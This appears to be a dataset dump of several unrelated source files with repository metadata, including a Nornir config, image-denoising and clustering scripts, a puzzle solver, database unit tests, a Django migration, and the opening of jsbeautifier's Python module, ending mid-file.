] | permissive | MedLemineMbedah/CliniqueEnligne | ad2de52c7e5679d1f34d3291ec713f23c5a811e6 | f0a3aa41159d22741eba6012050c4fdd7580395f | refs/heads/master | 2023-05-05T03:56:42.194170 | 2021-05-28T23:36:51 | 2021-05-28T23:36:51 | 371,837,762 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 257 | #!/home/medlemine/Projet_S2/Cliinique_Enligne/env/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from libfuturize.main import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"rkaka2766@gmail.com"
] | rkaka2766@gmail.com | |
787216a272c816c71c9e08a086ff040b31419f43 | a193ed2a98f0f53e9a8b68641e4bd9c45c8b1c4d | /flasnir-app/flasnir/nr_config.py | f08aa6afb0e587c4d5653d8ed58796b5a1a8bf94 | [] | no_license | silvanwalz/pythonkurs | c9fbedc784d525d8a0d7112455581c8f0c9d9a66 | ba43c1e3272e06fa81915674cd9d95e5ab969574 | refs/heads/main | 2023-08-16T20:48:05.857996 | 2021-10-05T14:48:39 | 2021-10-05T14:48:39 | 408,350,214 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 631 | py | from nornir import InitNornir
from nornir.core import Nornir
from flasnir.definitions import PROJECT_ROOT
HOSTS = PROJECT_ROOT / "config" / "inventory" / "hosts.yaml"
DEFAULTS = PROJECT_ROOT / "config" / "inventory" / "defaults.yaml"
def init_nornir() -> Nornir:
return InitNornir(
runner={
"plugin": "threaded",
"options": {
"num_workers": 100,
},
},
inventory={
"plugin": "SimpleInventory",
"options": {
"host_file": str(HOSTS),
"defaults_file": str(DEFAULTS)
},
},
) | [
"silvan.walz@hotmail.ch"
] | silvan.walz@hotmail.ch |
88487eb18e18b480c92e6a75b3a831acd56fea11 | caeb46f5bde10dc5e7f4624599ed3322a7cbd4a0 | /road_segmentation/predictions_training/post.py | 676806eb52c80a4244307dcbaa1ffc5c8fe0b4ed | [] | no_license | Prolog-ETHZ/cil-new | 2fe1528554deef12ef59b1ea8500e98b899bea60 | a88b99322e72a656119f75e9b1a74777cf6d4dd8 | refs/heads/master | 2020-06-18T09:17:38.412908 | 2017-07-03T21:06:01 | 2017-07-03T21:06:01 | 94,163,874 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,970 | py | import numpy as np
import matplotlib.pyplot as plt
from skimage.restoration import (denoise_tv_chambolle, denoise_bilateral,
denoise_wavelet, estimate_sigma)
from skimage import data, img_as_float, color
from skimage.util import random_noise
import matplotlib.image as mpimg
from PIL import Image
name = "./prediction_1.png"
original = img_as_float(mpimg.imread(name))
sigma = 0.155
noisy = original
fig, ax = plt.subplots(nrows=2, ncols=4, figsize=(8, 5), sharex=True,
sharey=True, subplot_kw={'adjustable': 'box-forced'})
plt.gray()
# Estimate the average noise standard deviation across color channels.
sigma_est = estimate_sigma(noisy, multichannel=True, average_sigmas=True)
# Due to clipping in random_noise, the estimate will be a bit smaller than the
# specified sigma.
print("Estimated Gaussian noise standard deviation = {}".format(sigma_est))
ax[0, 0].imshow(noisy)
ax[0, 0].axis('off')
ax[0, 0].set_title('Noisy')
ax[0, 1].imshow(denoise_tv_chambolle(noisy, weight=0.1, multichannel=True))
ax[0, 1].axis('off')
ax[0, 1].set_title('TV')
ax[0, 2].imshow(denoise_bilateral(noisy, sigma_color=0.05, sigma_spatial=15,
multichannel=True))
ax[0, 2].axis('off')
ax[0, 2].set_title('Bilateral')
ax[0, 3].imshow(denoise_wavelet(noisy, multichannel=True))
ax[0, 3].axis('off')
ax[0, 3].set_title('Wavelet denoising')
ax[1, 1].imshow(denoise_tv_chambolle(noisy, weight=0.2, multichannel=True))
ax[1, 1].axis('off')
ax[1, 1].set_title('(more) TV')
ax[1, 2].imshow(denoise_bilateral(noisy, sigma_color=0.1, sigma_spatial=15,
multichannel=True))
ax[1, 2].axis('off')
ax[1, 2].set_title('(more) Bilateral')
ax[1, 3].imshow(denoise_wavelet(noisy, multichannel=True, convert2ycbcr=True))
ax[1, 3].axis('off')
ax[1, 3].set_title('Wavelet denoising\nin YCbCr colorspace')
ax[1, 0].imshow(original)
ax[1, 0].axis('off')
ax[1, 0].set_title('Original')
fig.tight_layout()
plt.show() | [
"prolog949@gmail.com"
] | prolog949@gmail.com |
4f410a564f81eef398f188eb979ce9c032a2ffb0 | a2c90d183ac66f39401cd8ece5207c492c811158 | /Solving_Problem/daily_222/1205/4991.py | 93e9003c98ad92771f5ba370d3f2e866995051df | [] | no_license | kwoneyng/TIL | 0498cfc4dbebbb1f2c193cb7c9459aab7ebad02a | c6fbaa609b2e805f298b17b1f9504fd12cb63e8a | refs/heads/master | 2020-06-17T11:53:38.685202 | 2020-03-18T01:29:36 | 2020-03-18T01:29:36 | 195,916,103 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,848 | py | from collections import deque
from heapq import heappop, heappush
near = [[-1,0], [0,1], [1,0], [0,-1]]
def val_cha(st,ed):
temp = [i[:] for i in bd]
sx,sy = ht[st]
ex,ey = ht[ed]
serve = deque()
serve.append([sx,sy])
cnt = 0
while serve:
cnt += 1
for i in range(len(serve)):
x,y = serve.popleft()
if x == ex and y == ey:
dt[st][ed] = cnt - 1
dt[ed][st] = cnt - 1
return 0
for a,b in near:
xi,yi = a+x, b+y
if 0 <= xi < h and 0 <= yi < w and temp[xi][yi] != 'x':
temp[xi][yi] = 'x'
serve.append([xi, yi])
return -1
def build_root(vis, start=0, cnt=0):
global rs
if sum(vis) == dirty - 1:
rs = min(rs, cnt)
return 0
for i in range(1,dirty):
if not vis[i]:
vis[i] = 1
build_root(vis,i,cnt+dt[start][i])
vis[i] = 0
while True:
w,h = map(int,input().split())
if w == 0 and h == 0:
break
bd = [list(input()) for i in range(h)]
dirty = 1
rs = 9999999999999999999999
ht = {}
for x in range(h):
for y in range(w):
if bd[x][y] == 'o':
ht[0] = [x,y]
elif bd[x][y] == '*':
ht[dirty] = [x,y]
dirty += 1
dt = {}
for i in range(dirty):
dt[i] = {}
stop_flag = 0
for i in range(dirty-1):
if stop_flag == 0:
for j in range(i+1,dirty):
if val_cha(i,j) == -1:
print(-1)
stop_flag = 1
break
else:
break
if stop_flag == 0:
vis = [0]*dirty
build_root(vis)
print(rs)
| [
"nan308@naver.com"
] | nan308@naver.com |
a5ca80015d31f865b4e42fee95b8868018d1a822 | e06feda0b191c9f6759658948bb13f9dd99ad77e | /tests/test_user.py | 1f1147d73dd5e20b0b2751887c0124f980cfbb74 | [
"MIT"
] | permissive | konstantinfarrell/dbfoo | cfe887caf1d143d69bcad5b2234b614f2e1a1d91 | 69b4da509c71fcbef90e5931f1d68d051c154b57 | refs/heads/master | 2021-01-19T06:50:19.078799 | 2016-07-14T10:59:26 | 2016-07-14T10:59:26 | 61,979,362 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,277 | py | import unittest
from unittest import TestCase
from dbfoo.models import User, DataBase
class TestUser(TestCase):
def setUp(self):
"""
Sets up all testing variables that will be used.
"""
self.dbname = 'dbfootest'
self.db = DataBase(dbname=self.dbname)
self.users = User()
self.session = self.db.Session()
def test_add_user(self):
"""
Adds a user and generates data using the "randomize"
function.
"""
count = self.session.query(User).count()
u = User()
u.randomize()
self.db.store(u)
new_count = self.session.query(User).count()
self.assertEqual(count+1, new_count)
def test_add_user_from_init(self):
"""
Adds a user by passing arguments into the User
class instance.
"""
count = self.session.query(User).count()
u = User(first_name='foo', last_name='bar',
email='foobar@foobar.net', address='1123 1st st',
city='Portland', state='OR', phone='(555) 112-2013')
self.db.store(u)
new_count = self.session.query(User).count()
self.assertEqual(count+1, new_count)
def test_random_state(self):
"""
Tests that random states are chosen correctly and that
two random states are not the same.
"""
with open('dbfoo/data/states.txt', 'r') as states:
states = states.read().splitlines()
state = self.users.random_state()
new_state = self.users.random_state()
self.assertIn(state, states)
self.assertIn(new_state, states)
self.assertNotEqual(new_state, state)
def test_random_phone(self):
"""
Tests that a random phone number is the correct length
and that two random phone numbers are unique.
"""
phone = self.users.random_phone()
other_phone = self.users.random_phone()
self.assertEqual(len(phone), 10)
self.assertNotEqual(phone, other_phone)
def test_random_city(self):
"""
Tests that a random city is chosen from the list
of cities, and that two random cities are unique.
"""
with open('dbfoo/data/cities.txt', 'r') as cities:
cities = cities.read().splitlines()
city = self.users.random_city()
other_city = self.users.random_city()
self.assertIn(city, cities)
self.assertIn(other_city, cities)
self.assertNotEqual(city, other_city)
def test_create_email(self):
"""
Generates a first and last name for a user, then
tests to ensure the first and last name are contained
within the generated email address.
"""
self.users.first_name = self.users.random_first_name()
self.users.last_name = self.users.random_last_name()
username = "{}{}".format(self.users.first_name, self.users.last_name)
email = self.users.create_email(username)
self.assertIn("{}{}{}".format(self.users.first_name,
self.users.last_name,
'@'), email)
if __name__ == "__main__":
unittest.main()
| [
"konstantinfarrell@gmail.com"
] | konstantinfarrell@gmail.com |
e7d27bd42dd7a11e181cfccddc99887e0de43b62 | addeb3229b8da6a8b8b2453d342f7bab99e69a8f | /type_translate.py | c68da35a461efe79d1b7fb1fa1af36745a372596 | [] | no_license | biikashsubedi/Language-Translate | 09bf8d4771abcbccb13d317969aa43661c71de04 | 274024a98df6999c20c369ad8bf1254fd4696bf5 | refs/heads/master | 2022-08-28T19:21:50.604749 | 2020-05-28T20:15:16 | 2020-05-28T20:15:16 | 267,686,206 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 405 | py | from translate import Translator
import argparse
args = argparse.ArgumentParser("python3 type_translate.py")
args.add_argument('-ne', '-nepali')
args.add_argument('-ja', '-japanese')
args.add_argument('-es', '-spanish')
options = args.parse_args()
translator= Translator(to_lang="ja")
text = input("Enter To Translate: ")
translation = translator.translate(text)
print(translation)
| [
"noreply@github.com"
] | biikashsubedi.noreply@github.com |
115e5a6a73767a319ba0b7e1fd2b037efc9adb6a | 02482954c417e3d2d0f3cba6af90a936d9abe230 | /clusters.py | aa70e909d647c631e139a501aa2ff1a21bfd87b1 | [] | no_license | HuzeyfeAyaz/Election-Data-Analysis-Tool | c5394d9c5b3aae854f7a8d3c7feb52b06e8e47a5 | 0c1240425ff984c5a60aad9b751f11732ebdb995 | refs/heads/master | 2020-11-25T19:34:52.401570 | 2019-12-18T15:24:07 | 2019-12-18T15:24:07 | 228,814,561 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,529 | py | from PIL import Image,ImageDraw
from sklearn.metrics.pairwise import euclidean_distances
# import numpy as np
def readfile(filename):
lines=[line for line in file(filename)]
# First line is the column titles
colnames=lines[0].strip().split('\t')[1:]
rownames=[]
data=[]
for line in lines[1:]:
p=line.split('\t')
# First column in each row is the rowname
rownames.append(p[0])
# The data for this row is the remainder of the row
data.append([float(x) for x in p[1:]])
return rownames,colnames,data
from math import sqrt
def sim_distance(v1, v2):
sum_of_squares = sum([pow(v1[i] - v2[i], 2) for i in range(len(v1))])
return 1 - (1 / (1 + sqrt(sum_of_squares)))
def pearson(v1,v2):
# Simple sums
sum1=sum(v1)
sum2=sum(v2)
# Sums of the squares
sum1Sq=sum([pow(v,2) for v in v1])
sum2Sq=sum([pow(v,2) for v in v2])
# Sum of the products
pSum=sum([v1[i]*v2[i] for i in range(len(v1))])
# Calculate r (Pearson score)
num=pSum-(sum1*sum2/len(v1))
den=sqrt((sum1Sq-pow(sum1,2)/len(v1))*(sum2Sq-pow(sum2,2)/len(v1)))
if den==0: return 0
sim = 1.0-num/den
return sim
class bicluster:
def __init__(self,vec,left=None,right=None,distance=0.0,id=None):
self.left=left
self.right=right
self.vec=vec
self.id=id
self.distance=distance
def hcluster(rows,distance=pearson):
distances={}
currentclustid=-1
# Clusters are initially just the rows
clust=[bicluster(rows[i],id=i) for i in range(len(rows))]
while len(clust)>1:
lowestpair=(0,1)
closest=distance(clust[0].vec,clust[1].vec)
# loop through every pair looking for the smallest distance
for i in range(len(clust)):
for j in range(i+1,len(clust)):
# distances is the cache of distance calculations
if (clust[i].id,clust[j].id) not in distances:
distances[(clust[i].id,clust[j].id)]=distance(clust[i].vec,clust[j].vec)
d=distances[(clust[i].id,clust[j].id)]
if d<closest:
closest=d
lowestpair=(i,j)
# calculate the average of the two clusters
mergevec=[
(clust[lowestpair[0]].vec[i]+clust[lowestpair[1]].vec[i])/2.0
for i in range(len(clust[0].vec))]
# create the new cluster
newcluster=bicluster(mergevec,left=clust[lowestpair[0]],
right=clust[lowestpair[1]],
distance=closest,id=currentclustid)
# cluster ids that weren't in the original set are negative
currentclustid-=1
del clust[lowestpair[1]]
del clust[lowestpair[0]]
clust.append(newcluster)
return clust[0]
def printclust(clust,labels=None,n=0):
# indent to make a hierarchy layout
for i in range(n): print ' ',
if clust.id<0:
# negative id means that this is branch
print '-'
else:
# positive id means that this is an endpoint
if labels==None: print clust.id
else: print labels[clust.id]
# now print the right and left branches
if clust.left!=None: printclust(clust.left,labels=labels,n=n+1)
if clust.right!=None: printclust(clust.right,labels=labels,n=n+1)
def getheight(clust):
# Is this an endpoint? Then the height is just 1
if clust.left==None and clust.right==None: return 1
# Otherwise the height is the same of the heights of
# each branch
return getheight(clust.left)+getheight(clust.right)
def getdepth(clust):
# The distance of an endpoint is 0.0
if clust.left==None and clust.right==None: return 0
# The distance of a branch is the greater of its two sides
# plus its own distance
return max(getdepth(clust.left),getdepth(clust.right))+clust.distance
def drawdendrogram(clust,labels,jpeg='clusters.jpg'):
# height and width
h=getheight(clust)*20
w=1200
depth=getdepth(clust)
# width is fixed, so scale distances accordingly
scaling=float(w-150)/depth
# Create a new image with a white background
img=Image.new('RGB',(w,h),(255,255,255))
draw=ImageDraw.Draw(img)
draw.line((0,h/2,10,h/2),fill=(255,0,0))
# Draw the first node
drawnode(draw,clust,10,(h/2),scaling,labels)
img.save(jpeg,'JPEG')
def drawnode(draw,clust,x,y,scaling,labels):
if clust.id<0:
h1=getheight(clust.left)*20
h2=getheight(clust.right)*20
top=y-(h1+h2)/2
bottom=y+(h1+h2)/2
# Line length
ll=clust.distance*scaling
# Vertical line from this cluster to children
draw.line((x,top+h1/2,x,bottom-h2/2),fill=(255,0,0))
# Horizontal line to left item
draw.line((x,top+h1/2,x+ll,top+h1/2),fill=(255,0,0))
# Horizontal line to right item
draw.line((x,bottom-h2/2,x+ll,bottom-h2/2),fill=(255,0,0))
# Call the function to draw the left and right nodes
drawnode(draw,clust.left,x+ll,top+h1/2,scaling,labels)
drawnode(draw,clust.right,x+ll,bottom-h2/2,scaling,labels)
else:
# If this is an endpoint, draw the item label
draw.text((x+5,y-7),labels[clust.id],(0,0,0))
def rotatematrix(data):
newdata=[]
for i in range(len(data[0])):
newrow=[data[j][i] for j in range(len(data))]
newdata.append(newrow)
return newdata
import random
def kcluster(rows,distance=pearson,k=4):
# Determine the minimum and maximum values for each point
ranges=[(min([row[i] for row in rows]),max([row[i] for row in rows]))
for i in range(len(rows[0]))]
# Create k randomly placed centroids
clusters=[[random.random()*(ranges[i][1]-ranges[i][0])+ranges[i][0]
for i in range(len(rows[0]))] for j in range(k)]
lastmatches=None
for t in range(100):
print 'Iteration %d' % t
bestmatches=[[] for i in range(k)]
# Find which centroid is the closest for each row
for j in range(len(rows)):
row=rows[j]
bestmatch=0
for i in range(k):
d=distance(clusters[i],row)
if d<distance(clusters[bestmatch],row): bestmatch=i
bestmatches[bestmatch].append(j)
# If the results are the same as last time, this is complete
if bestmatches==lastmatches: break
lastmatches=bestmatches
# Move the centroids to the average of their members
for i in range(k):
avgs=[0.0]*len(rows[0])
if len(bestmatches[i])>0:
for rowid in bestmatches[i]:
for m in range(len(rows[rowid])):
avgs[m]+=rows[rowid][m]
for j in range(len(avgs)):
avgs[j]/=len(bestmatches[i])
clusters[i]=avgs
return bestmatches
def tanimoto(v1,v2):
c1,c2,shr=0,0,0
for i in range(len(v1)):
if v1[i]!=0: c1+=1 # in v1
if v2[i]!=0: c2+=1 # in v2
if v1[i]!=0 and v2[i]!=0: shr+=1 # in both
return 1.0-(float(shr)/(c1+c2-shr))
def scaledown(data,distance=pearson,rate=0.01):
n=len(data)
# The real distances between every pair of items
realdist=[[distance(data[i],data[j]) for j in range(n)]
for i in range(0,n)]
# Randomly initialize the starting points of the locations in 2D
loc=[[random.random(),random.random()] for i in range(n)]
fakedist=[[0.0 for j in range(n)] for i in range(n)]
lasterror=None
for m in range(0,1000):
# Find projected distances
for i in range(n):
for j in range(n):
fakedist[i][j]=sqrt(sum([pow(loc[i][x]-loc[j][x],2)
for x in range(len(loc[i]))]))
# Move points
grad=[[0.0,0.0] for i in range(n)]
totalerror=0
for k in range(n):
for j in range(n):
if j==k: continue
# The error is percent difference between the distances
errorterm=(fakedist[j][k]-realdist[j][k])/realdist[j][k]
# Each point needs to be moved away from or towards the other
# point in proportion to how much error it has
grad[k][0]+=((loc[k][0]-loc[j][0])/fakedist[j][k])*errorterm
grad[k][1]+=((loc[k][1]-loc[j][1])/fakedist[j][k])*errorterm
# Keep track of the total error
totalerror+=abs(errorterm)
print totalerror
# If the answer got worse by moving the points, we are done
if lasterror and lasterror<totalerror: break
lasterror=totalerror
# Move each of the points by the learning rate times the gradient
for k in range(n):
loc[k][0]-=rate*grad[k][0]
loc[k][1]-=rate*grad[k][1]
return loc
def draw2d(data,labels,jpeg='mds2d.jpg'):
img=Image.new('RGB',(2000,2000),(255,255,255))
draw=ImageDraw.Draw(img)
for i in range(len(data)):
x=(data[i][0]+0.5)*1000
y=(data[i][1]+0.5)*1000
draw.text((x,y),labels[i],(0,0,0))
img.save(jpeg,'JPEG')
| [
"huzeyfeayaz23@hotmail.com"
] | huzeyfeayaz23@hotmail.com |
f7ba00666a6535fe41c81838590fae2a7a2d6db6 | 457c303283b4bb61e4082dbf6ed54fb46c46a877 | /tracker/migrations/0006_auto_20210122_0811.py | cd95a32e68871fbb70358b43a7c7ceb7c11937c5 | [] | no_license | nhieckqo/apitrack | 9bbe178eb94be932b10c0b658445d5a14294fe60 | ca008756d0ea457c538d21237d422afaa4730fab | refs/heads/main | 2023-02-24T13:12:11.703582 | 2021-01-30T12:41:28 | 2021-01-30T12:41:28 | 333,355,204 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 646 | py | # Generated by Django 3.1.2 on 2021-01-22 00:11
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('tracker', '0005_auto_20210122_0809'),
]
operations = [
migrations.AlterField(
model_name='apiintegrationsummary',
name='last_active_discussion_date',
field=models.DateTimeField(),
),
migrations.AlterField(
model_name='currentstatus',
name='entry_timestamp',
field=models.DateTimeField(default=datetime.datetime(2021, 1, 22, 8, 11, 27, 728882)),
),
]
| [
"nhieckqo9@gmail.com"
] | nhieckqo9@gmail.com |
f5b214a76ce69ee2ac15708f09c2ad0fd7c0da08 | d3f5ee94a9a7bd57d9cb23b5cb547fbf4360ed56 | /venv/bin/easy_install-2.7 | ad5a8621f91433997df407f92ee90d4ac789f88b | [] | no_license | chaiwon59/aws_deeplens_ml | d197f4800682423bcd42deb6b4347dc0f43a0fa7 | 5b07e389cc00cd8a64e28c431b13725585ec1004 | refs/heads/master | 2023-04-21T03:07:19.759244 | 2021-04-22T12:27:54 | 2021-04-22T12:27:54 | 360,510,306 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 283 | 7 | #!/Users/chaiwonpark/PycharmProjects/machineLearning/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from setuptools.command.easy_install import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"c.park-3@student.tudelft.nl"
] | c.park-3@student.tudelft.nl |
3e48796bf6d16d0f0492289087cc246a6b7db31d | 10cb51733fd18a6535c681ea26d8548eb1017ea5 | /src/main/resources/static/global/plugins/js-beautify/python/jsbeautifier/__init__.py | f3bf455c3585b8635394dff6f36704bc0bcd1ddc | [
"MIT"
] | permissive | morosainos/MSS_GRADLE | 8489eb156f4dc8fd231d6a079973205f449dd424 | 8cae374b953c4698eb2299e34884a80cc7051705 | refs/heads/master | 2021-01-19T17:33:43.666423 | 2017-06-14T15:15:20 | 2017-06-14T15:15:20 | 88,329,385 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 85,068 | py | from __future__ import print_function
import sys
import os
import getopt
import re
import string
import errno
import copy
from jsbeautifier.__version__ import __version__
#
# The MIT License (MIT)
# Copyright (c) 2007-2013 Einar Lielmanis and contributors.
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# Originally written by Einar Lielmanis et al.,
# Conversion to python by Einar Lielmanis, einar@jsbeautifier.org,
# Parsing improvement for brace-less and semicolon-less statements
# by Liam Newman <bitwiseman@gmail.com>
# Python is not my native language, feel free to push things around.
#
# Use either from command line (script displays its usage when run
# without any parameters),
#
#
# or, alternatively, use it as a module:
#
# import jsbeautifier
# res = jsbeautifier.beautify('your javascript string')
# res = jsbeautifier.beautify_file('some_file.js')
#
# you may specify some options:
#
# opts = jsbeautifier.default_options()
# opts.indent_size = 2
# res = jsbeautifier.beautify('some javascript', opts)
#
#
# Here are the available options: (read source)
class BeautifierOptions:
def __init__(self):
self.indent_size = 4
self.indent_char = ' '
self.indent_with_tabs = False
self.eol = '\n'
self.preserve_newlines = True
self.max_preserve_newlines = 10
self.space_in_paren = False
self.space_in_empty_paren = False
self.e4x = False
self.jslint_happy = False
self.space_after_anon_function = False
self.brace_style = 'collapse'
self.keep_array_indentation = False
self.keep_function_indentation = False
self.eval_code = False
self.unescape_strings = False
self.wrap_line_length = 0
self.break_chained_methods = False
self.end_with_newline = False
self.comma_first = False
# For testing of beautify ignore:start directive
self.test_output_raw = False
def __repr__(self):
return \
"""indent_size = %d
indent_char = [%s]
preserve_newlines = %s
max_preserve_newlines = %d
space_in_paren = %s
jslint_happy = %s
space_after_anon_function = %s
indent_with_tabs = %s
brace_style = %s
keep_array_indentation = %s
eval_code = %s
wrap_line_length = %s
unescape_strings = %s
""" % ( self.indent_size,
self.indent_char,
self.preserve_newlines,
self.max_preserve_newlines,
self.space_in_paren,
self.jslint_happy,
self.space_after_anon_function,
self.indent_with_tabs,
self.brace_style,
self.keep_array_indentation,
self.eval_code,
self.wrap_line_length,
self.unescape_strings,
)
class BeautifierFlags:
def __init__(self, mode):
self.mode = mode
self.parent = None
self.last_text = ''
self.last_word = ''
self.declaration_statement = False
self.declaration_assignment = False
self.multiline_frame = False
self.if_block = False
self.else_block = False
self.do_block = False
self.do_while = False
self.in_case = False
self.in_case_statement = False
self.case_body = False
self.indentation_level = 0
self.line_indent_level = 0
self.start_line_index = 0
self.ternary_depth = 0
def apply_base(self, flags_base, added_newline):
next_indent_level = flags_base.indentation_level
if not added_newline and \
flags_base.line_indent_level > next_indent_level:
next_indent_level = flags_base.line_indent_level
self.parent = flags_base
self.last_text = flags_base.last_text
self.last_word = flags_base.last_word
self.indentation_level = next_indent_level
class Acorn:
def __init__(self):
# This is not pretty, but given how we did the version import
# it is the only way to do this without having setup.py fail on a missing six dependency.
self.six = __import__("six")
# This section of code was translated to python from acorn (javascript).
#
# Acorn was written by Marijn Haverbeke and released under an MIT
# license. The Unicode regexps (for identifiers and whitespace) were
# taken from [Esprima](http://esprima.org) by Ariya Hidayat.
#
# Git repositories for Acorn are available at
#
# http://marijnhaverbeke.nl/git/acorn
# https://github.com/marijnh/acorn.git
# ## Character categories
# Big ugly regular expressions that match characters in the
# whitespace, identifier, and identifier-start categories. These
# are only applied when a character is found to actually have a
# code point above 128.
self.nonASCIIwhitespace = re.compile(self.six.u("[\u1680\u180e\u2000-\u200a\u202f\u205f\u3000\ufeff]"))
self.nonASCIIidentifierStartChars = self.six.u("\xaa\xb5\xba\xc0-\xd6\xd8-\xf6\xf8-\u02c1\u02c6-\u02d1\u02e0-\u02e4\u02ec\u02ee\u0370-\u0374\u0376\u0377\u037a-\u037d\u0386\u0388-\u038a\u038c\u038e-\u03a1\u03a3-\u03f5\u03f7-\u0481\u048a-\u0527\u0531-\u0556\u0559\u0561-\u0587\u05d0-\u05ea\u05f0-\u05f2\u0620-\u064a\u066e\u066f\u0671-\u06d3\u06d5\u06e5\u06e6\u06ee\u06ef\u06fa-\u06fc\u06ff\u0710\u0712-\u072f\u074d-\u07a5\u07b1\u07ca-\u07ea\u07f4\u07f5\u07fa\u0800-\u0815\u081a\u0824\u0828\u0840-\u0858\u08a0\u08a2-\u08ac\u0904-\u0939\u093d\u0950\u0958-\u0961\u0971-\u0977\u0979-\u097f\u0985-\u098c\u098f\u0990\u0993-\u09a8\u09aa-\u09b0\u09b2\u09b6-\u09b9\u09bd\u09ce\u09dc\u09dd\u09df-\u09e1\u09f0\u09f1\u0a05-\u0a0a\u0a0f\u0a10\u0a13-\u0a28\u0a2a-\u0a30\u0a32\u0a33\u0a35\u0a36\u0a38\u0a39\u0a59-\u0a5c\u0a5e\u0a72-\u0a74\u0a85-\u0a8d\u0a8f-\u0a91\u0a93-\u0aa8\u0aaa-\u0ab0\u0ab2\u0ab3\u0ab5-\u0ab9\u0abd\u0ad0\u0ae0\u0ae1\u0b05-\u0b0c\u0b0f\u0b10\u0b13-\u0b28\u0b2a-\u0b30\u0b32\u0b33\u0b35-\u0b39\u0b3d\u0b5c\u0b5d\u0b5f-\u0b61\u0b71\u0b83\u0b85-\u0b8a\u0b8e-\u0b90\u0b92-\u0b95\u0b99\u0b9a\u0b9c\u0b9e\u0b9f\u0ba3\u0ba4\u0ba8-\u0baa\u0bae-\u0bb9\u0bd0\u0c05-\u0c0c\u0c0e-\u0c10\u0c12-\u0c28\u0c2a-\u0c33\u0c35-\u0c39\u0c3d\u0c58\u0c59\u0c60\u0c61\u0c85-\u0c8c\u0c8e-\u0c90\u0c92-\u0ca8\u0caa-\u0cb3\u0cb5-\u0cb9\u0cbd\u0cde\u0ce0\u0ce1\u0cf1\u0cf2\u0d05-\u0d0c\u0d0e-\u0d10\u0d12-\u0d3a\u0d3d\u0d4e\u0d60\u0d61\u0d7a-\u0d7f\u0d85-\u0d96\u0d9a-\u0db1\u0db3-\u0dbb\u0dbd\u0dc0-\u0dc6\u0e01-\u0e30\u0e32\u0e33\u0e40-\u0e46\u0e81\u0e82\u0e84\u0e87\u0e88\u0e8a\u0e8d\u0e94-\u0e97\u0e99-\u0e9f\u0ea1-\u0ea3\u0ea5\u0ea7\u0eaa\u0eab\u0ead-\u0eb0\u0eb2\u0eb3\u0ebd\u0ec0-\u0ec4\u0ec6\u0edc-\u0edf\u0f00\u0f40-\u0f47\u0f49-\u0f6c\u0f88-\u0f8c\u1000-\u102a\u103f\u1050-\u1055\u105a-\u105d\u1061\u1065\u1066\u106e-\u1070\u1075-\u1081\u108e\u10a0-\u10c5\u10c7\u10cd\u10d0-\u10fa\u10fc-\u1248\u124a-\u124d\u1250-\u1256\u1258\u125a-\u125d\u1260-\u1288\u128a-\u128d\u1290-\u12b0\u12b2-\u12b5\u12b8-\u12be\u12c0\u12c2-\u12c5\u12c8-\u12d6\u12d8-\u1310\u1312-\u1315\u1318-\u135a\u1380-\u138f\u13a0-\u13f4\u1401-\u166c\u166f-\u167f\u1681-\u169a\u16a0-\u16ea\u16ee-\u16f0\u1700-\u170c\u170e-\u1711\u1720-\u1731\u1740-\u1751\u1760-\u176c\u176e-\u1770\u1780-\u17b3\u17d7\u17dc\u1820-\u1877\u1880-\u18a8\u18aa\u18b0-\u18f5\u1900-\u191c\u1950-\u196d\u1970-\u1974\u1980-\u19ab\u19c1-\u19c7\u1a00-\u1a16\u1a20-\u1a54\u1aa7\u1b05-\u1b33\u1b45-\u1b4b\u1b83-\u1ba0\u1bae\u1baf\u1bba-\u1be5\u1c00-\u1c23\u1c4d-\u1c4f\u1c5a-\u1c7d\u1ce9-\u1cec\u1cee-\u1cf1\u1cf5\u1cf6\u1d00-\u1dbf\u1e00-\u1f15\u1f18-\u1f1d\u1f20-\u1f45\u1f48-\u1f4d\u1f50-\u1f57\u1f59\u1f5b\u1f5d\u1f5f-\u1f7d\u1f80-\u1fb4\u1fb6-\u1fbc\u1fbe\u1fc2-\u1fc4\u1fc6-\u1fcc\u1fd0-\u1fd3\u1fd6-\u1fdb\u1fe0-\u1fec\u1ff2-\u1ff4\u1ff6-\u1ffc\u2071\u207f\u2090-\u209c\u2102\u2107\u210a-\u2113\u2115\u2119-\u211d\u2124\u2126\u2128\u212a-\u212d\u212f-\u2139\u213c-\u213f\u2145-\u2149\u214e\u2160-\u2188\u2c00-\u2c2e\u2c30-\u2c5e\u2c60-\u2ce4\u2ceb-\u2cee\u2cf2\u2cf3\u2d00-\u2d25\u2d27\u2d2d\u2d30-\u2d67\u2d6f\u2d80-\u2d96\u2da0-\u2da6\u2da8-\u2dae\u2db0-\u2db6\u2db8-\u2dbe